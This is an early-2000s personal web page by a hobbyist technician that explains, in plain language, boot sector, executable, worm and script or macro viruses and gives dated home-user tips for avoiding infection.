Tips from the Geekman - Gary Goodman

This is not meant to be the definitive answer on Computer Viruses, because situations can change over time, but this should prove to be a guide and paranoia reducer. 
My intention was to present a broad lesson, as much in simple English as possible.
The point of this overview is to have enough knowledge to avoid virus infection. 
So this is a long article for a WebPage. 
If this Overview is too long or technical, you can skip to PAGE 2 - THE SOLUTIONS, and 
at least practice CYA.      "considered-safe" File Types
Page 2 -
the Solutions

For the purposes of this discussion, I would like to point out three main types of viruses. 

1) A traditional virus, such as a boot sector virus or an executable file.  This is the type most resembling a human virus, which is a non-living fragment of DNA code that hijacks cells in the body and turns them into virus factories, and then looks for new hosts to spread to. 

A boot sector virus is a tiny bit of code that usually arrives in the form of an infected floppy disk, with an infected boot sector.  Merely reading the contents of the disk transfers the virus to the boot sector of the hard drive, which in turn can infect more floppy disks or wipe out the hard drive. 

It may embed itself in the boot sector code, or may replace the boot sector code with itself, and move the boot sector information to another part of the hard drive, thereby causing itself to run the moment the hard drive is accessed at startup.  Some of these can hide in memory, and then write themselves back to the hard drive at shutdown, which is why virus scanners test memory first.  ("Memory" means the electronic "scratch pad" chips that the computer uses to work.  Anything in memory disappears when the power goes off.) 

An executable virus is an executable program that either is a virus or contains a virus embedded inside it. This would have a file extension of EXE or COM or PIF or SCR. They frequently arrive as a doubled file extension so as to appear as a "safe" file, such as something.TXT.exe.   An executable virus can also launch a boot sector virus or overwrite the boot sector or the partition table, essentially erasing the hard drive. Note that a Script virus below normally relies on a hidden extenstion VBS, but that extension can be unhidden by instructions on Page 2. 

I read about one dangerous file extension that stays hidden in Windows even when that "Hide" option is disabled:  the SHS extension (Scrap object) used by the VBS/Stages.A virus.  The subject of such an email can be one of the following:  Life stages  Funny  Jokes, with the content saying something about "The male and female stages of life".  The majority of users will see only an attachment of the harmless-looking name LIFE_STAGES.TXT.  Part of the trick here is that the attachment will open to reveal the (dumb) joke.  For this reason, I will include a special note on how to unhide that extension manually on Page 2.

Some of these replace critical system files with themselves, or embed some programming code inside the file, to run every time the file is launched, thereby hiding.  Antivirus software can usually clean the file and remove the code, but not always. CIH is one example of a powerful and "deadly" virus that can wipe out the hard drive and in some cases the system board.  I fixed this recently on someone's computer where it had taken over or replaced the system "shell", Explorer.EXE, which is what makes Windows Desktop appear and generally runs the user interface.

At this point I must disclaim that the details are quite complex, so I won't vouch for complete technical accuracy with the terminology and details, nor will I engage in irrelevant attempts at technical accuracy that would serve only to confuse the average user.  This should serve as a good general overview. 
See disclaimer on Tech Tips page for more infomation.

Executable and Boot Sector types are the most challenging to design, they require someone actually skilled in writing programs in assembly language or at least C++, and they use various schemes to hide out or even morph their own code to avoid detection.  This morphing (poly-morphic virus) is similar to how HIV, the AIDS virus, is able to defeat scientists by continually changing and evolving it's outer protein structure so that antibodies and medicine cannot lock on, and the body can't keep up with it's changes.

The CIH virus will attempt to write to the system BIOS (Basic Input-Output System) chip on the motherboard, but recent motherboards with a Flash BIOS are usually now protected in some way such that writing to them requires overcoming certain barriers like code verification and human interaction, or even physically moving a jumper on the motherboard. 

Typically, people are lured into launching an Executable file of this type (or using an untested floppy disk), by being led to believe it's a benign or a 'fun' program.  Many of these therefore arrive as a "Trojan Horse", a benign gift with a nasty payload inside, if you know the story of the Trojan Horse. 

One partial exception is when a "script virus" (explained later) was somehow launched and that launched another virus, or opened a hole for a remote virus to be secretly and surreptitiously installed.

A Trojan Horse would NOT include files that are NOT executables, like JPG or GIF or BMP pictures, AVI movies,MPG movies,RAM Real Player streams, WAV sounds, MP3 or M3U sounds, TXT text files, PDF adobe acrobat files, WRI and RTF rich text format documents, ZIP compressed containers (not necessarily ZIP contents).  URL web links, if you're otherwise patched.  As of today, all these are safe to open. 
Any NFO or CFG or other file that you can view in Notepad or Wordpad or MS Paint or Winzip's Internal Text Viewer or Quickview is safe

Any program that is not an executable and cannot run a script or macro  (explained later) should be considered as safe; note however that even Windows Media Player needs to be updated + patched because a vulnerability was discovered with that program. 

A neutral opinion on Microsoft is that by adding more and more user-friendly and gimmick-y and advanced features to their software, they also add potential vulnerabilities that are later discovered.  It's a tradeoff. As some people have quipped, if you want to be 100% safe, unplug your computer and don't turn it on.

An HTML WebPage file could not infect you by itself, but it could try to run a dangerous script, if your computer isn't updated + patched . 

This SCAM infection is fairly easy to avoid.  Don't launch an unknown Program that someone sends you without at least detaching it and scanning it first. Scan floppy disks. Scan a CD if you think a file on it could be infected. Chances are strong you will be safe. 

Many years ago I inserted a Windows 95 installation floppy disk at work that contained a boot virus.  According to my peer, one batch of these disks was infected at the factory when they were made, however I have not verified this rumor.  Today, any software vendor worth their salt is safe. 

I have not heard if a bootable CD could contain a boot sector virus, so I'll update that information later, but it sounds possible since they are created from bootable floppy disks, so scan them if you suspect one. 

These traditional viruses seem not as prevalent because 
a) people don't use floppies as often, and 
b) they require advanced programming skills that most "script kiddies" don't possess, (and I don't currently possess either)

2)  A worm virus such as Code Red and NIMDA of 2001.  These two virii are called Worms.  Some versions of this worm are using a security hole in the Internet explorer application (IFRAME).  They show up on antivirus scanners as W32 types, like W32.Nimda.A@mm.  NIMDA's primary trick involved a security hole in Microsoft's Internet Information Service, a "mini" personal web server, plus full-fledged web servers, and a MIME exploit. 
Known vulnerabilities have been corrected by free patches and updates from Microsoft. 

Once the IIS web service was hijacked, the worm would then use that computer to quietly launch probes looking for more victims.  If this server actually served WebPages, then anyone accessing those WebPages would be infected.  Many actual Web Servers were fixed before they were compromised, but certainly in the whole world many were missed. NIMDA also shared all hard drives with full access and some versions reported information back to some remote computer, opening up a security hole for other infections and exploits. It was actually a very interesting and creative monster.

CLICK Here for some (edited) info on major viruses from CERT:

Here's one related tip: NIMDA also exploited TFTP - Trivial File Transfer Protocol - and that is not used anymore (people use FTP but not TFTP), so search your hard drive for  *TFTP*.* and delete (both)TFTP.EXE.  It will stay in your Recycle Bin for a while anyhow, but trust me, you don't need it. 

NIMDA would also probe for Shared Folders with full read-write access. If the shared folder was the "root" of the hard drive [C:], and it had no security configured, a computer that could freely access that network could write to the entire hard drive.  If the Shared folder was directly accessible over the Internet, it was an easy target. 

Web servers are inherently potentially insecure, open to requests from anonymous users, unless locked down and monitored by a knowledgeable system administrator.  Microsoft had released security updates to fix the vulnerabilities, but not everyone was diligent enough to apply the fix in time. 

Laptops at work were running demos of monitoring software that reported manufacturing data in real time, and that software required IIS (Internet Info Server) to work.  The (often remotely assigned) sales people were not systems administrators, and thus their Laptops did not get patched or updated.   As you can imagine....

These worms required no interaction from the user to launch -- it was lack of diligent interaction that caused the problem to multiply.

3)  A Script or Macro virus is not a traditional "virus" per se, but it does exploit Windows and takes over your computer.  These are the most common now, because they are relatively easy to write.  Windows Internet Explorer and Outlook and Outlook Express all allow some scripts to run by default.  The system is supposed to prevent anything powerful enough to break your system from running without your express permission.
Here's some more technical info that  thing Windows 2000 Help says about Scripting:

Many WebSites serving standard HTML language also embed some form of scripting, legitimately and beneficially.  Web-based scripting is supposed to be restricted to doing only "Web-related" things, such as display a Page.  Javascript and J-script and Visual Basic Script embedded in a WebPage (or Email) is supposed to be restricted to not allow any type of harmful access. 

So, here's another quick tip:  If you're not in a corporate environment, go to Add-Remove Programs in the Control Panel, and [Windows Setup] tab and remove Windows Script Host, if that's installed. WebPages will still run safe restricted scripted commands, but if you or someone else accidentally launches a WSH file, it won't be able to run. 

Similarly, Microsoft Office applications can run Macro code to improve productivity.  That's just fairly simple Visual Basic commands embedded in a Document.  I have created Macros in Microsoft Word and Excel for myself, like to apply a color to a cell, or open a specific document via a key combination or a custom button.  A Macro can be written to do more powerful and negative things too.  Unfortunately, the computer by itself is too dumb to know if a Macro embedded in a document is friendly or fatal, only that it exists (if Macro Warnings are enabled). 
TIP: If a Word Document you receive in email can be detached and viewed in QuickView or launched in Wordpad, neither of those programs can run Macros.  Neither can Notepad if you can force the file to open in Notepad. 

So the most common issues are three-fold: 
system weakness: scripts and other exploits that work on holes in barriers, or 
default settings: settings that allow Email to run unsafe scripting, and 
Scams orTrojan Horsies: people choosing to run a script or launching an Office Document untested, because an Email lured them to do so. 

The most common is the Scam method -- social engineering -- getting the recipient to launch the attachment.  The "I Love You" virus thrived on innocence or gullibility, and insufficient technical knowledge to recognize the potential danger of launching a MS Word Document with no leading information (just a 'come on').  But that's not qualitatively different than any other non-computer scam. 

A couple of these scam viruses are worth mentioning, due to their cleverness: >>

As system weaknesses and security holes are discovered or reported in the world, Microsoft makes corrections and releases fixes, but it seems that the average person rarely applies them, and ignores the Windows Update icon on their menu.  Microsoft and other parties also publish suggestions on the Web for modifying default settings (typically wide-open for maximum utility) for more security. 

In conclusion (of this overview), it is fairly simple to avoid most of these types of infections, by 
a) applying patches, frequently Unpatched, many of these viruses require no more interaction than opening an email
b) locking down Email settings, and 
c) not manually launching unknown files of certain types that could contain malicious code.

On the other hand, your computer experience might be hampered if you are afraid to launch any kind of file, even a legitimate download by a legitimate WebSite that writes software.  If you are uninformed, you might fear a free program, like SetTimehttp://www.p-squared.com by Pete Pinter, that updates my clock to match a Navy time server, yet install a program like Gator or AudioGalaxy (which are not a virus but is a form of "surfing spyware").  You might delete all Email with attachments without cause, but leave your default Email settings vulnerable.
Page 2 -
the Solutions

Gary Goodman
330 733 3518
Gary's resume


OR just hit BACK button on your browser